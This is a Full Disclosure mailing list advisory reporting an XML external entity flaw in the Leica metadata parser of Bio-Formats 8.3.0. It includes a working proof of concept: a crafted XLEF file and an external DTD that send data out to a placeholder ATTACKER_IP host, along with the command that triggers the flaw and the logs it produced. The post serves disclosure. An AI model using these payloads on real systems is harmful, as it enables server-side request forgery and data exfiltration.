Full Disclosure mailing list archives

Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser


From: Ron E <ronaldjedgerson () gmail com>
Date: Mon, 29 Dec 2025 22:56:29 -0500

Bio-Formats contains an XML External Entity (XXE) vulnerability in the
Leica Microsystems metadata parsing component. The vulnerability is caused
by the use of an insecurely configured DocumentBuilderFactory when
processing Leica XML-based metadata files (e.g., XLEF). When a crafted XML
file is supplied, the parser allows external entity resolution and external
DTD loading, enabling attackers to trigger arbitrary outbound network
requests, access local system resources, or cause a denial-of-service
condition during XML parsing.

*Impact:*
An attacker who can supply a crafted Leica XML metadata file may:
* Trigger XML External Entity (XXE) injection
* Perform server-side request forgery (SSRF) via outbound HTTP requests
* Access local files where XML-safe content exists
* Cause denial of service through entity expansion or parser instability
* Exfiltrate data through blind out-of-band channels
Exploitation occurs during XML parsing and does not require authentication.

*Proof of Concept:*
Malicious XLEF File
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
  <!ENTITY % ext SYSTEM "http://ATTACKER_IP:8000/evil.dtd";>
  %ext;
]>
<xlef>
  <Image>&exfil;</Image>
</xlef>
Attacker-Controlled External DTD (evil.dtd)
<!ENTITY exfil SYSTEM "http://ATTACKER_IP:8000/exfil?data=ubuntu";>

*Exploit Execution:*
java -cp bioformats_package.jar \
     loci.formats.tools.ImageInfo xxe_blind.xlef

*Observed Exploit Output:*
Victim Application Output
Initializing reader
XLEFReader initializing xxe_blind.xlef
http://ATTACKER_IP:8000/exfil?data=ubuntu
java.io.FileNotFoundException: http://ATTACKER_IP:8000/exfil?data=ubuntu
    at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity
    at org.apache.xerces.impl.XMLEntityManager.startEntity
    at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset
    at javax.xml.parsers.DocumentBuilder.parse
    at LMSXmlDocument.initFromFilepath(LMSXmlDocument.java:125)
Attacker HTTP Server Log
192.x.x.x - - [23/Dec/2025 23:28:19]
"GET /exfil?data=ubuntu HTTP/1.1" 404 -
The outbound HTTP request confirms that the XML parser resolved
attacker-controlled external entities during file parsing.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/